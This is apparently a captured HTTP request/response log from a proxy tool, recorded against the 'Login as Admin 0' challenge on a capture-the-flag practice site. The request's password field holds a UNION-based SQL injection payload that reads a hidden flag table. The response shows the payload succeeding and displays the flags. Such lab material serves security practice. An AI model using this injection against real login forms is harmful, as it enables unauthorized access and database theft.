    <request base64="false"><![CDATA[POST /login0/ HTTP/1.1
Host: hackme.inndy.tw
Connection: close
Content-Length: 103
Cache-Control: max-age=0
Origin: https://hackme.inndy.tw
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://hackme.inndy.tw/login0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7

name=null&password=\' UNION select 1,concat(the_f14g),3,4 from login_as_admin0.h1dden_f14g limit 0,1;--]]></request>
    <status>200</status>
    <responselength>1523</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Jan 2019 07:27:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15768000
Content-Length: 1326

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login As Admin 0</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
    <div class="jumbotron">
        <div class="container">
            <h1>Login as Admin 0</h1>
        </div>
    </div>

    <div class="container">
        <div class="navbar">
            <div class="container-fluid">
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">Please Hack Me</a>
                </div>
                <ul class="nav navbar-nav">
                    <li>
                        <a href="/scoreboard">Scoreboard</a>
                    </li>
                    <li>
                        <a href="?show_source=1" target="_blank">Source Code</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>

    <div class="container">
        <div class="col-md-6 col-md-offset-3">
            <h3>Hi, FLAG{Good, Union select is quite easy to exploit!}</h3>

            <h4>You are admin!</h4>

            <code>FLAG{\' UNION SELECT &quot;I Know SQL Injection&quot; #}</code>, flag2 in the database!        </div>
    </div>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
</items>
